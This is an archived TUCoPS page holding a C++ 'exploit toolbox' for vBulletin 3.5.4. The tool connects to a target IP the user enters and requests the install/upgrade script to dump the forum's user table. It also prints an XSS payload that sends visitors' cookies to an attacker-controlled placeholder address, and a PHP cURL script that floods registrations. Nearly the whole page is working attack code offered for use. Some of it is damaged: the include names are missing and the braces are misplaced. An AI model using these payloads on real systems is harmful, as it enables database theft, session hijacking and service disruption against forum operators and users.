Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: b06-5249.htm

vbulletin Exploit Tool Box ]



vbulletin Exploit Tool Box
vbulletin Exploit Tool Box



This Box continue the 3 vbulletin exploits, under it you can use the vbulletin install path exploit, the other two exploits can be only watched.

Code:
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include 
#include 
using namespace std;

string exploit;
string answer;
string answer2;
long s;
sockaddr_in addr;
char IPaddr[1024];
/*You have to change to the right path*/
char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n";
char stry[41943040];
long I;
long M, J, K, L;
int i;

int main()
{
cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl;
cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl;
cout << "> Press 1 for Install_path exploit" << endl; 
cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl;
cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl;
cout << "> Programm Author M4k3, www.pldsoft.com" << endl; 
cout << "> Copyright by PLDsoft.com" << endl;
cout << "> Number? "; cin >> exploit;
cout << endl;

if (exploit == "1")
{
cout << "  ____________________ " << endl;
cout << " |---PLDsoft.com------|" << endl;
cout << " |--------------------|" << endl;
cout << " |-vbulletin  3.5.4---|" << endl;
cout << " |install_path exploit|" << endl;
cout << " |____________________|" << endl;
cout << "##############################################" << endl;
cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl;
cout << "###############################################" << endl;
cout << endl;
cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl; 
cout << "Remote : Yes" << endl;
cout << "Critical Level : Dangerous"<< endl;
cout << "############################################" << endl;
cout << "Affected software description :" << endl;
cout << endl;
cout << "Application : vbulletin" << endl; 
cout << "version : latest version [ 3.60 Release 4 ]" << endl;
cout << "URL : http://www.vbulletin.com" << endl; 
cout << endl;
cout << "########################################" << endl;
cout << "Exploit:" << endl;
cout << endl;
cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylettersbutnotnumbers!]" << endl; 
cout << endl;
cout << "when it works, you can download the database..." << endl;
cout << endl; 
cout << "########################################" << endl;
cout << "Contact:" << endl;
cout << "Nick: M4k3" << endl;
cout << "E-mail: m4k3@pldsoft.com" << endl; 
cout << "Website: http://www.pldsoft.com" << endl; 
cout << "_______End of Exploit______" << endl;
cout << endl;
sleep(1);
cout << "Use the exploit now?" << endl;
cout << "yes/no: "; cin >> answer;
}
if (answer == "yes")
{
cout << "Starting vbulletin 3.5.4 install_path exploit" << endl;
{
cout << "Insert IP: "; cin >> IPaddr;
M = 0;
J = 0;
K = 0;
L = 0;
while(IPaddr[i] != 0)
{
    if(IPaddr[i] >= '0' && IPaddr[i] <= '9')
    {
        L *= 10;
        L += IPaddr[i] - '0';
        K++;
        if(K > 3)
        {
            M = -1;
            break;
        }
    }
    else if(IPaddr[i] == '.')
    {
        if(K == 0)
        {
         M = -1;
         break;
        }
        if(L >= 255)
        {
         M = -1;
         break;
        }
        J++;
        K = 0;
        L = 0;
    }
    else
    {
        M = -1;
        break;
    }
    M++;
}
if(M == -1 || J != 3)
{
    cout << "> Invalid IP-Address!" << endl;
    return 0;
}
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    addr.sin_family = AF_INET;
    inet_aton(IPaddr, &addr.sin_addr);
    addr.sin_port = htons(80);
    if(connect(s, (sockaddr*) &addr, sizeof(sockaddr_in)))
    {
        printf("Failure: Connection Rested!\r\n");
        close(s);
        return 1;
    }
    if(send(s, sget, strlen(sget), 0) == 0)
    {
        printf("Failure: Not able to send packets!\r\n");
        close(s);
        return 2;
    }
    
    if((I = recv(s, stry, 41943040, 0)) == 0)
    {
        printf("Failure: Not able to receive packets!\r\n");
        close(s);
        return 3;

    
    
    return 0;
    }
    close(s);
    printf("Packets received succesfully!\r\nBytes of received Data: %d\r\n", I);
    printf("%s", stry);
    return 0;
}
}

else if (exploit == "2")
{
cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )"<< endl;
cout << "=> Author: SpiderZ"<< endl; 
cout << "=> Sito: www.spiderz.tk"<< endl; 
cout << endl;
cout << "_____________________________________________________________"<< endl;
cout << endl;
cout << "( 1 )"<< endl;
cout << endl;
cout << " "<< endl;
cout << endl;
cout << "'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;"<< endl; 
cout << "$x1=`host $REMOTE_ADDR|grep Name`;"<< endl;
cout << "$x2=$REMOTE_PORT;"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << ""<< endl;
cout << endl;
cout << ""<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "' onmouseover='document.location=""http://YOUR ADDRESS WEB.com/exploit.php?"" "<< endl; 
cout << "c=""+document.cookie' b='"""<< endl;
cout << endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "location=""http://YOUR ADDRESS WEB.com"""<< endl; 
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "( 3 )"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "Like Using"<< endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "1  new thread"<< endl;
cout << "2 href=""http://YOUR ADDRESS WEB.com/IMAGE.GIF"" target=""_blank"">BEAUTIFUL GIRL'"<< endl; 
cout << "3  Submit"<< endl;
cout << "4  It waits for"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "# www.spiderz.tk " << endl; 
cout << endl;
cout << "_______End of Exploit______" << endl;
}
else if (exploit == "3")
{
cout << "Script : vBulletin Version 3.5.4" << endl;
cout << endl;
cout << "site : www.vbulletin.com" << endl; 
cout << endl;
cout << "Exploit by : x-boy" << endl;
cout << endl;
cout << "E-mail : Dicomdk (at) gmail (dot) com [email concealed]" << endl;
cout << endl;
cout << "Type : Registration flood in register.php" << endl;
cout << endl;
cout << "Thanks to : Simo64" << endl;
cout << endl;
cout << endl;
cout << "Code of exploit (For english version , you can change it to other language)=> exploit.php" << endl;
cout << endl;
cout << "cURL Must be activated (http://curl.haxx.se)" << endl; 
cout << endl;
cout << "Sorry for my bad English :-)" << endl;
cout << endl;
cout << endl;
cout << "http://localhost/vb3 to the url of the script" << endl; 
cout << endl;
cout << "curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');" << endl; 
cout << endl;
cout << "curl_setopt($ch , CURLOPT_POST , 1) ;" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_POSTFIELDS ," << endl;
cout << "'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5" << endl;
cout << "=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&password" << endl;
cout << "con" << endl;
cout << "firm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gm" << endl; 
cout << "ail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST" << endl;
cout << "corrections always on&options[showemail]=1');" << endl;
cout << endl;
cout << "curl_exec($ch);" << endl;
cout << endl;
cout << "curl_close($ch);" << endl;
cout << endl;
cout << "}" << endl;
cout << endl;
cout << "//Flood finished good luck" << endl;
cout << endl;
cout << "?>" << endl;
cout << endl;
cout << "____End of Exploit___" << endl;
}
else
{
cout << "File not found / Failed to open file" << endl;
}

cout << endl;
cout << endl;
cout << endl;
cout << "Copyright and Programming by PLDsoft.com, [Author M4k3]" << endl;
cout << "Contact m4k3@pldsecurity[dot]de" << endl;
return 0;
}

More Informations by: PLDsoft.com


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH